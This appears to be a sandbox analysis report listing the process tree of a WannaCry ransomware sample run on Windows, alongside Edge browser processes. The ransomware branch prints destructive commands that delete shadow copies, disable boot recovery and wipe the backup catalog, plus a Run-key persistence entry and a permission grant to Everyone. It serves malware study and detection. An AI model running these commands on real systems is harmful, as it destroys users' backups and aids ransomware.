  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
  2⤵
  PID:128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
  2⤵
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8540 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8648 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8704 /prefetch:1
  2⤵
  PID:3272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1676 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7800 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=paint_preview.mojom.PaintPreviewCompositorCollection --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=print_compositor --mojo-platform-channel-handle=2632 /prefetch:8
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
  2⤵
  PID:1444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1888

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004D0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4972

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2112

C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\WannaCry.EXE
"C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\WannaCry.EXE"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5356
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:440
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:660
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 274131724034993.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4924
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    PID:2740
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:5992
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4160
- - C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:5280
- - C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:5272
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4212
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 284
      4⤵
      Program crash
      PID:5532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 284
      4⤵
      Program crash
      PID:1604
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:336
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5948
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mnmgcwodykunqun973" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\tasksche.exe\"" /f
  2⤵
  PID:6092
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mnmgcwodykunqun973" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4124
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5136
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1888
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2800
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2892
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2700
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4200
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1856
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:932
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1696
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3172
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5132
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4068
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1116
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:572
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1044
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:228
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5956
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4324
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2664
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5404
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4808
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3020
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1508
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1232
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:980
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2664
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5904
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3624
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5084
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6156
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6304
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:6308
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6548
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6764
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6460
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5156
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6748
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4180
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6440
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:3812
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5832
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4580
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:7092
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3992
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:6384
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:6992
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5292
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:6288
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5740
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  PID:6256
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:7096
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2200
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2988
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:248
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:6560
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1716
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2992
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6732
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5140
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:6152
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:6596
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6172
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6836
- C:\Users\Admin\Downloads\WannaCry-main\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa5ca33cb8,0x7ffa5ca33cc8,0x7ffa5ca33cd8
  2⤵
  PID:2104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
  2⤵
  PID:756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
